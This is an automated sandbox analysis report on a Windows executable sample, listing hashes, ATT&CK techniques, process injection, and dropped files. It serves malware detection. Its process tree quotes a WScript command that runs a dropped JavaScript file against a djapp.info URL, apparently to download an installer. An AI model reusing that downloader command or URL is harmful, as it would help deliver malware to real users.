12cdb45cbde5f8d2ee37b287d91d68f1c71ad7a8e343c144ae2d24f3e9a0d955

Analysis

max time kernel
119s
max time network
119s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
19/09/2024, 14:10

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe
Size

184KB
MD5

ea4c72504f6f57fa03108801fa104aa3
SHA1

472923bbcaf4857f3259779a5847ffaf0edd4fdf
SHA256

12cdb45cbde5f8d2ee37b287d91d68f1c71ad7a8e343c144ae2d24f3e9a0d955
SHA512

e7d1066ee49f2a7e30e262d95524bba508ffc819d2874fbdd137dbb52fd64542450b2792c032b619e88f73abe86dc862a75be54c08243d99652f1aa074136ded
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3sMV:/7BSH8zUB+nGESaaRvoB7FJNndnLY

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	1084	WScript.exe
8	1084	WScript.exe
10	1084	WScript.exe
12	2560	WScript.exe
13	2560	WScript.exe
15	1872	WScript.exe
16	1872	WScript.exe
18	1076	WScript.exe
19	1076	WScript.exe
21	2360	WScript.exe
22	2360	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1672	2336	WerFault.exe	30

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2336 wrote to memory of 1084	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	31
PID 2336 wrote to memory of 1084	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	31
PID 2336 wrote to memory of 1084	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	31
PID 2336 wrote to memory of 1084	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	31
PID 2336 wrote to memory of 2560	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	33
PID 2336 wrote to memory of 2560	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	33
PID 2336 wrote to memory of 2560	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	33
PID 2336 wrote to memory of 2560	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	33
PID 2336 wrote to memory of 1872	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	35
PID 2336 wrote to memory of 1872	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	35
PID 2336 wrote to memory of 1872	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	35
PID 2336 wrote to memory of 1872	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	35
PID 2336 wrote to memory of 1076	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	37
PID 2336 wrote to memory of 1076	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	37
PID 2336 wrote to memory of 1076	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	37
PID 2336 wrote to memory of 1076	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	37
PID 2336 wrote to memory of 2360	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	39
PID 2336 wrote to memory of 2360	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	39
PID 2336 wrote to memory of 2360	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	39
PID 2336 wrote to memory of 2360	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	39
PID 2336 wrote to memory of 1672	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	41
PID 2336 wrote to memory of 1672	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	41
PID 2336 wrote to memory of 1672	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	41
PID 2336 wrote to memory of 1672	2336	2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe	41

C:\Users\Admin\AppData\Local\Temp\2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe
"C:\Users\Admin\AppData\Local\Temp\2024-09-19_ea4c72504f6f57fa03108801fa104aa3_mafia.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2336
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufDF48.js" http://www.djapp.info/?domain=KhfMJjtiCw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fufDF48.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1084
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufDF48.js" http://www.djapp.info/?domain=KhfMJjtiCw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fufDF48.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2560
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufDF48.js" http://www.djapp.info/?domain=KhfMJjtiCw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fufDF48.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1872
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufDF48.js" http://www.djapp.info/?domain=KhfMJjtiCw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fufDF48.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1076
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufDF48.js" http://www.djapp.info/?domain=KhfMJjtiCw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fufDF48.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2360
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2336 -s 608
  2⤵
  - Program crash
  PID:1672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
d4b118fc03e94cdcaab5ce325c0de015

SHA1
5c1f0e485c7747a647f64a637719e0eeabb7381a

SHA256
1bc87828f9877188b02d1b569998a09de77194247520424c415d98f21fe870cf

SHA512
62cf303ca0858f321a11b5da3922efaa2565fa70caf1a1e86052384c63def2297b44cdc3ca80159a08e1d63ac83fd7870165364cf1660f715b0a7c6587c5e9f6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
a76f56170421fbb7485264dd8a08c327

SHA1
4ea2a4e0e53b7058d0864612738e7454df8318b7

SHA256
d8c19220a3f7a0ad5ab2835dc78907f90beeb1cd4e647c6ab25dd92447ba694d

SHA512
31fd2cf0d9cf684e3dba818e53422cc1efb474cdfafd86df121df5f97732875010302d2a9c6db0dda6535b5767066aa02934ae679a8905f616e4538ffec761fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\domain_profile[1].htm

Filesize
6KB

MD5
f2b60fda8a41caeb11dff7184b3e33d6

SHA1
c28b6579ea70b44cf4a7c0d7b6dd346b63fdd4ce

SHA256
1f93b189d73aed45124b8e6dbca9d0f451e5fc67445f300e6f111fda2fadc64f

SHA512
9704df4d94e3f74c1517b9fc99b93e7883b6f25c020985e9f02e8d72458d365a8288e04e7f437a72f45eb6e4819cebae49634f99a097c5a94fc2f75a992c9582

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\domain_profile[1].htm

Filesize
6KB

MD5
dbba59d19687a8ac42972d9048c85b95

SHA1
536d8aa44a64a9ebb0327dc75414111f19204b6f

SHA256
dd124d17c9cd902d98d036d17b312df8f68e3c1a502fea9e6d6728d60f84eece

SHA512
0321184a8b7b03f68f0c226a17e477016538280220bb13886689766188b3004da82e7d8ae1216f6b266421a3336ec4942f0fce8640920aa263c2f9efa940a23f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\domain_profile[1].htm

Filesize
6KB

MD5
0a9f401d713560357075e9c0a58a49ad

SHA1
b8864ae479d4ae5b7a2f25db54bb10ab10846a1f

SHA256
1c4b05a7d75a18a886320a89aa0940b39ae5e7982f1561b6f2556606735ed70c

SHA512
537c8037b57c2a0796e75065846fe3874f32e61151b55c1051311444fbdc062fbe8e01076633ce84a27267bf6e46a6b767855f42cf97b14b2d766e946828cdf2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WUBCGJ0A\domain_profile[1].htm

Filesize
6KB

MD5
d77005401769891f0b91da2c4a764acd

SHA1
b62a0cf66d26caa31aea8978e456d80d8e78744d

SHA256
011689ebd0d58694bbffbf7cf29a9e6c785130d262053a9b80dd1bc6101477f4

SHA512
6cdadeae685d9c500f58b68bdf9f283274a2d19a75a22e07a7eda8710d926210ba4500c718c417a73e43dc0e97661383d5fadcd5312a990e54c5e5f005b4c4f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WUBCGJ0A\domain_profile[1].htm

Filesize
6KB

MD5
fcd8d5d1ab4251824409f2b627788bbb

SHA1
fcda8d7d0b1bdeb5cb5da783f3ad6018e5349976

SHA256
23854c33612da6c3dba6e4d3f49f711f48198760657acc7b62d538aafcd53ffc

SHA512
437256acf9c6dbb477d78c4140579d29d8049b88ab898fe98479815806c573ab312d4180ccf246950174f89a78aa15a9dd59e0279e88f982a3c51d4ffaa32142

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab26D2.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3F23.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufDF48.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\UOMOXX4O.txt

Filesize
177B

MD5
4e228134395d7402bd46d5310c726c04

SHA1
7247e43a37cca81bce74852c5ab4fe545ed46ccc

SHA256
f4a5326a7c0c8621a6cc64632ad8300b865ce3d495b3a1429fef52c1845fcf99

SHA512
d598daeef8f0adb0bb9b62a9406ca11251d6de659dbb80d12175a224497dfd84df783439d03699aa37298fbd8231c2675100a1b61ae1be9477501cfe898c737e

Download Submit